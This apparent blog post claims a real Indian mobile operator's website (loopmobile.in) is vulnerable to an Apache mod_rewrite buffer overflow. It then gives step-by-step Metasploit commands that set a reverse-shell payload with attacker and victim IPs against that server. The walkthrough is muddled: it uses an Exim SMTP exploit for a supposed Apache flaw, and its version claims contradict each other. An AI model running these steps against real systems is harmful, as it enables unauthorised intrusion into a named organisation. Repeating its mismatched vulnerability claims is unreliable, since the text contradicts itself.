Loop Mobile is Vulnerable To Buffer Overflow Attack

Loop mobile is the best and leading service provider in Mumbai and it also provides the best connectivity solutions. The website of the company also provides you the best information that might be helpful for resolving the query. You can even send mails to the company through the website by just filling the form and entering a few details. You would get the reply soon on the issue and it will be well taken care of. They even have the facility of letting you recharge your phone online. They have the customer workshop section that will have their team asking you the problem faced or suggestions to improve the services. You just need to enter a few details and the company would let you know when and where the workshop is. With the help of Loop Mobile customer care number you can get a safe and long-lasting usage of the Loop Mobile services.

But recent days I was testing loop mobile(www.loopmobile.in) website for vulnerabilities and I found that the website is fully vulnerable to buffer flow attack. The reason behind is that that the website is running on Apache 2. X version older than 2.0.51 server.

Affected Apache versions:

• Apache 1.3.28 - 1.3.36 with mod_rewrite
• Apache 2.2.0 - 2.2.2 with mod_rewrite
• Apache 2.0.46 - 2.0.58 with mod_rewrite

The impact of this vulnerability is that an attacker may exploit this issue to trigger a denial-of-service condition. Reportedly, arbitrary code execution may also be possible

About Buffer Flow Attack:

In computer security and programming, a Buffer overflow or Buffer overrun , is an anomaly where a program, while writing data to a buffer, overruns the buffer boundary and Overwrites adjacent memory. This is a special case violation of memory safety. Buffer overflows can be triggered by inputs that are designed To execute code, or alter the way the program operates. This may result in erratic program behavior, including memory Access errors, incorrect results, a crash, or a breach of system Security. They are thus the basis of many software vulnerabilities and can be maliciously exploited.

How It can be done with an example:

Step 1:

Load your Backtrack 5 machine and open terminal.

Step 2:

Type msfconsole in it.

msfconsole means Metasploit console, Most of people think that by Metasploit they will hack Pc's easily, they are foolish people.The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework , a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

Step 3:

Now type 

msf >use exploit/unix/smtp/exim4_string_format

Step 4:

Type 

msf exploit(exim4_string_format) >show payloads

Step 5:

Type 

msf exploit(exim4_string_format) >set PAYLOAD generic/shell_reverse_tcp

Step 6:

 Type

msf exploit(exim4_string_format) >set LHOST [MY IP ADDRESS]

Step 7:

Type

msf exploit(exim4_string_format) >set RHOST [TARGET IP]

Note: Here the thing is to get the IP of the victim (web server), you can also use ping command to get the IP details.

Step 8:

This is the last step to exploit--- 

Type

msf exploit(exim4_string_format) >exploit

Author Bio:

Ashwin Kak, co-founder of this blog and the author of this post, is an SEO executive by profession. He's a simple person with all possible emotions present at different degrees. In his spare time, he enjoys trekking and blogging.